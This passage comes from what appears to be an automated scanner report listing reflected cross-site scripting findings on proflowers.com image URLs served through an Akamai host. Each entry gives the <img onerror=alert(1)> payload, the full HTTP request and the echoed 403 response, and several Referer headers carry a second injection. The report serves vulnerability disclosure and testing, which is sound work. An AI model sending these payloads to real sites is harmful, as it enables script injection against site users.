Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:51 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000M519_VA0606_W1_PFc2ba5<img src=a onerror=alert(1)>fbc47c0020f

4.108. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ea72b<img%20src%3da%20onerror%3dalert(1)>f25cd72b5d0 was submitted in the REST URL parameter 9. This input was echoed as ea72b<img src=a onerror=alert(1)>f25cd72b5d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PFea72b<img%20src%3da%20onerror%3dalert(1)>f25cd72b5d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:48 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PFea72b<img src=a onerror=alert(1)>f25cd72b5d0

4.109. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload db8a2<img%20src%3da%20onerror%3dalert(1)>dc2c61a3c73 was submitted in the REST URL parameter 9. This input was echoed as db8a2<img src=a onerror=alert(1)>dc2c61a3c73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PFdb8a2<img%20src%3da%20onerror%3dalert(1)>dc2c61a3c73?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:52 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000R212_VA1137_W1_PFdb8a2<img src=a onerror=alert(1)>dc2c61a3c73

4.110. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5add8<img%20src%3da%20onerror%3dalert(1)>51d9c6eb19b was submitted in the REST URL parameter 9. This input was echoed as 5add8<img src=a onerror=alert(1)>51d9c6eb19b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF5add8<img%20src%3da%20onerror%3dalert(1)>51d9c6eb19b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4incampanula_dblbskt09_PF5add8<img src=a onerror=alert(1)>51d9c6eb19b

4.111. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a996e<img%20src%3da%20onerror%3dalert(1)>05540ad9da6 was submitted in the REST URL parameter 9. This input was echoed as a996e<img src=a onerror=alert(1)>05540ad9da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PFa996e<img%20src%3da%20onerror%3dalert(1)>05540ad9da6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4inmoneytree_lotus09_PFa996e<img src=a onerror=alert(1)>05540ad9da6

4.112. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f94e9<img%20src%3da%20onerror%3dalert(1)>2cc41beea4f was submitted in the REST URL parameter 9. This input was echoed as f94e9<img src=a onerror=alert(1)>2cc41beea4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PFf94e9<img%20src%3da%20onerror%3dalert(1)>2cc41beea4f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PFf94e9<img src=a onerror=alert(1)>2cc41beea4f

4.113. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 75728<img%20src%3da%20onerror%3dalert(1)>1d0b0a9d30d was submitted in the REST URL parameter 9. This input was echoed as 75728<img src=a onerror=alert(1)>1d0b0a9d30d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF75728<img%20src%3da%20onerror%3dalert(1)>1d0b0a9d30d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF75728<img src=a onerror=alert(1)>1d0b0a9d30d

4.114. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b7dea<img%20src%3da%20onerror%3dalert(1)>38121d80567 was submitted in the REST URL parameter 9. This input was echoed as b7dea<img src=a onerror=alert(1)>38121d80567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PFb7dea<img%20src%3da%20onerror%3dalert(1)>38121d80567?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:12 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6incallapnk_victin11_PC1601_PFb7dea<img src=a onerror=alert(1)>38121d80567

4.115. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 874d0<img%20src%3da%20onerror%3dalert(1)>5db3fd9eabd was submitted in the REST URL parameter 9. This input was echoed as 874d0<img src=a onerror=alert(1)>5db3fd9eabd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF874d0<img%20src%3da%20onerror%3dalert(1)>5db3fd9eabd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF874d0<img src=a onerror=alert(1)>5db3fd9eabd

4.116. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 494e2<img%20src%3da%20onerror%3dalert(1)>b57ae1753bf was submitted in the REST URL parameter 9. This input was echoed as 494e2<img src=a onerror=alert(1)>b57ae1753bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF494e2<img%20src%3da%20onerror%3dalert(1)>b57ae1753bf?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:55 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF494e2<img src=a onerror=alert(1)>b57ae1753bf

4.117. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c5572<img%20src%3da%20onerror%3dalert(1)>cbdab6a22f3 was submitted in the REST URL parameter 9. This input was echoed as c5572<img src=a onerror=alert(1)>cbdab6a22f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PFc5572<img%20src%3da%20onerror%3dalert(1)>cbdab6a22f3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6ingardtop_fpc08_PFc5572<img src=a onerror=alert(1)>cbdab6a22f3

4.118. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 34857<img%20src%3da%20onerror%3dalert(1)>40952913b8 was submitted in the REST URL parameter 9. This input was echoed as 34857<img src=a onerror=alert(1)>40952913b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF34857<img%20src%3da%20onerror%3dalert(1)>40952913b8?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF34857<img src=a onerror=alert(1)>40952913b8

4.119. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c211e<img%20src%3da%20onerror%3dalert(1)>87d2347cfbd was submitted in the REST URL parameter 9. This input was echoed as c211e<img src=a onerror=alert(1)>87d2347cfbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PFc211e<img%20src%3da%20onerror%3dalert(1)>87d2347cfbd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inltpnkrosalea_victin10_PFc211e<img src=a onerror=alert(1)>87d2347cfbd

4.120. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f0c74<img%20src%3da%20onerror%3dalert(1)>ba3c5695188 was submitted in the REST URL parameter 9. This input was echoed as f0c74<img src=a onerror=alert(1)>ba3c5695188 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PFf0c74<img%20src%3da%20onerror%3dalert(1)>ba3c5695188?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PFf0c74<img src=a onerror=alert(1)>ba3c5695188

4.121. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e53ea<img%20src%3da%20onerror%3dalert(1)>797c7d57c08 was submitted in the REST URL parameter 9. This input was echoed as e53ea<img src=a onerror=alert(1)>797c7d57c08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_le53ea<img%20src%3da%20onerror%3dalert(1)>797c7d57c08?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkanthur_sqwht09_le53ea<img src=a onerror=alert(1)>797c7d57c08

4.122. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ec4fd<img%20src%3da%20onerror%3dalert(1)>179007b844c was submitted in the REST URL parameter 9. This input was echoed as ec4fd<img src=a onerror=alert(1)>179007b844c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PFec4fd<img%20src%3da%20onerror%3dalert(1)>179007b844c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PFec4fd<img src=a onerror=alert(1)>179007b844c

4.123. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 962c9<img%20src%3da%20onerror%3dalert(1)>9f2e498f529 was submitted in the REST URL parameter 9. This input was echoed as 962c9<img src=a onerror=alert(1)>9f2e498f529 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

